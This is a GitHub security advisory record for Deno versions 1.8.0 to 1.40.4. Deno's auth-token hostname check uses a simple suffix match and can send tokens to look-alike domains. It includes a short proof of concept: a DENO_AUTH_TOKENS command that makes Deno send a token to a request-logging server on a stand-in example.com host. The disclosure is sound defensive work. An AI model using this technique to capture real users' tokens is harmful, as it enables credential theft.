GHSA-5frw-4rwq-xhcr

Source
https://github.com/advisories/GHSA-5frw-4rwq-xhcr
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-5frw-4rwq-xhcr/GHSA-5frw-4rwq-xhcr.json
Aliases
Published
2024-03-06T17:03:36Z
Modified
2024-03-21T18:25:42Z
Details

Summary

Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com may be sent to notexample.com.

Details

authtokens.rs uses a simple endswith check, which matches www.deno.land to a deno.land token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens.

PoC

  • Set up a server that logs requests. RequestBin will do. For example, denovulnpoc.example.com.
  • Run DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain. For example, DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com
  • Observe that the token intended only for the truncated domain is sent to the full domain

Impact

What kind of vulnerability is it? Who is impacted? Anyone who uses DENOAUTHTOKENS and imports potentially untrusted code is affected.

References

Affected packages

crates.io / deno

Package

Name
deno

Affected ranges

Type
SEMVER
Events
Introduced
1.8.0
Fixed
1.40.4